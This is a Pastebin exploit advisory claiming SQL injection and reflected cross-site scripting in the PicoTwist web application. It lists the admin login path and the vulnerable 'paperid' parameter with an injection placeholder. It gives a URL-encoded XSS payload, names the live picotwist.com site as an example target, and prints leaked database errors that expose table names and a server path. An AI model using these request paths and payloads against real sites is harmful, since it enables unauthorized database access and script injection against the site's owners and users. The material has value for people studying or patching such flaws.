API tools faq
paste
KingSkrupellos

PicoTwist XSS SQL Injection

KingSkrupellos
Aug 28th, 2019
119
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.28 KB | None | 0 0
raw download clone embed print report
  1. ###################################################################
  2.  
  3. # Exploit Title : PicoTwist XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 29/08/2019
  7. # Vendor Homepage : picotwist.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Impact :
  22. ***********
  23. PicoTwist is prone to an SQL-injection vulnerability because it fails to sufficiently
  24. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could
  25. allow an attacker to compromise the application, access or modify data, or exploit
  26. latent vulnerabilities in the underlying database. A remote attacker can send a specially
  27. crafted request to the vulnerable application and execute arbitrary SQL commands in
  28. application`s database. Further exploitation of this vulnerability may result in unauthorized
  29. data manipulation. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. Reflected XSS (or Non-Persistent) :
  32. ***************************************
  33. The server reads data directly from the HTTP
  34. request and reflects it back in the HTTP response. Reflected XSS exploits occur when an
  35. attacker causes a victim to supply dangerous content to a vulnerable web application,
  36. which is then reflected back to the victim and executed by the web browser. The most common
  37. mechanism for delivering malicious content is to include it as a parameter in a URL that is
  38. posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute
  39. the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
  40. that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
  41. the content is executed by the victim's browser.
  42.  
  43. ###################################################################
  44.  
  45. PicoTwist is supported by Région Rhone-Alpes, Crealys, Ecole Normale
  46. Supérieure de Lyon, Région Ile de France, Agoranov and Oseo Anvar
  47.  
  48. # Admin Panel Login Path :
  49. ************************
  50. /index.php?content=login&option=index
  51.  
  52. # SQL Injection Exploit :
  53. **********************
  54. /index.php?content=biblio&option=mining&item=FillEmail&paperid=[SQL Injection]
  55.  
  56. # Cross Site Scripting XSS Exploit :
  57. ********************************
  58. /index.php?content=biblio&option=mining&item=FillEmail&paperid=1%27
  59. %3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-By-
  60. KingSkrupellos%3C/font%3E%3C/marquee%3E
  61.  
  62. ###################################################################
  63.  
  64. # Example Vulnerable Sites :
  65. *************************
  66. [+] picotwist.com/index.php?content=biblio&option=mining&item=FillEmail&paperid=1%27
  67.  
  68. [+] picotwist.com/index.php?content=biblio&option=mining&item=FillEmail&paperid=1%27
  69. %3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-By-
  70. KingSkrupellos%3C/font%3E%3C/marquee%3E
  71.  
  72. ###################################################################
  73.  
  74. # Example SQL Database Error :
  75. ****************************
  76. Erreur. problème dans l'exécution de la requête : SELECT * FROM itemOfInterest
  77. where memberId = and paperId = -1
  78. Erreur. MySQL proteste : You have an error in your SQL syntax; check the manual that
  79. corresponds to your MySQL server version for the right syntax to use near 'and paperId = -1' at line 1
  80.  
  81. Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result
  82. resource in /htdocs/public/www/BD.class.php on line 58
  83. Erreur. problème dans l'exécution de la requête : SELECT * FROM itemOfInterest
  84. where memberId = and paperId <= 0 and special is not null
  85.  
  86. ###################################################################
  87.  
  88. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  89.  
  90. ###################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!